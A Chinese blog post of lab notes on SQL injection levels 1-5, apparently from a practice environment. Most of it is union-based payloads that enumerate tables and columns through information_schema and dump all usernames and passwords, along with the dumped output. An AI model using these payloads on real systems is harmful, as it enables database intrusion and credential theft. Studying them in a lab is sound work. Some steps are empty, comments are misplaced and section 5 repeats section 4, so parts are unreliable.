天天看點

2020.12.17 SQL注入SQL注入1-5題

SQL注入1-5題

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql資料庫的使用者名
SELECT DATABASE() -- 目前資料庫

SELECT *,schema_name FROM schemata -- 目前使用者擁有的所有的資料庫的名字,schema_name
SELECT * FROM TABLES -- 目前使用者擁有的所有資料庫及其庫下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 目前使用者擁有的所有資料庫及其庫下面的表的名字,及表下面的字段的名字
           

(1).擷取所有賬号密碼 有引号

  1. 擷取通路資料源列數
?id=1 order by 3 --+    //看是否通路出值,存在表示列數存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将後面的imint進行一個注釋 
           
  1. 擷取賬号和密碼所在列
?id=' union select 1,2,3  --+     // '  強行閉合放空

           
  1. 擷取所在的庫庫名(爆庫)
  1. 擷取所在的庫下的表名,并試着尋找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
    //Your Login name:emails,referers,uagents,users   找出來的表
           
  1. 擷取表下面的列,檢視是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果,确定了表
           
  1. 擷取所有密碼和賬号
?id=' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼
           

(2).擷取所有賬号密碼 無引号

  1. 擷取通路資料源列數
?id=1 order by 3 --+    //看是否通路出值,存在表示列數存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   
//--+  将後面的imint進行一個注釋    因為id為數字型,沒有單引号括着
           
  1. 擷取賬号和密碼所在列
?id='' union select 1,2,3  --+
//數字型放空直接兩個單引号
           
  1. 擷取所在的庫庫名(爆庫)
  1. 擷取所在的庫下的表名,并試着尋找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表
           
  1. 擷取表下面的列,檢視是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果,确定了表
           
  1. 擷取所有密碼和賬号
?id='' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼
           

(3).擷取所有賬号密碼 存在括号和單引号

  1. 擷取通路資料源列數
?id=1 order by 3 --+    //看是否通路出值,存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為id為數字型,是以這裡不需要存在閉合
           
  1. 擷取賬号和密碼所在列
?id=') union select 1,2,3  --+
//數字型放空直接兩個單引号
?id='') union select 1,2,3  --+ //可以運作但是無結果,因為括号單引号和外閉合
           
  1. 擷取所在的庫庫名(爆庫)
  1. 擷取所在的庫下的表名,并試着尋找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表
           
  1. 擷取表下面的列,檢視是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果,确定了表
           
  1. 擷取所有密碼和賬号
?id=') union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼
           

(4)擷取所有賬号密碼 雙引号與括号

  1. 擷取通路資料源列數
?id=1") order by 3 --+    //看是否通路出值,存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為存在雙引号和括号,需要對應才可以得到内容
           
  1. 擷取賬号和密碼所在列
?id=") union select 1,2,3  --+
//數字型放空直接兩個單引号
           
  1. 擷取所在的庫庫名(爆庫)
  1. 擷取所在的庫下的表名,并試着尋找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表
           
  1. 擷取表下面的列,檢視是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果,确定了表
           
  1. 擷取所有密碼和賬号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼
           

(5)擷取所有賬号密碼

  1. 擷取通路資料源列數
?id=1") order by 3 --+    //看是否通路出值,存在表示列數存在  
//--+  将後面的imint進行一個注釋    因為存在雙引号和括号,需要對應才可以得到内容
           
  1. 擷取賬号和密碼所在列
?id=") union select 1,2,3  --+
//數字型放空直接兩個單引号
           
  1. 擷取所在的庫庫名(爆庫)
  1. 擷取所在的庫下的表名,并試着尋找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出來的表
           
  1. 擷取表下面的列,檢視是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的結果,确定了表
           
  1. 擷取所有密碼和賬号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的賬号和密碼
           

繼續閱讀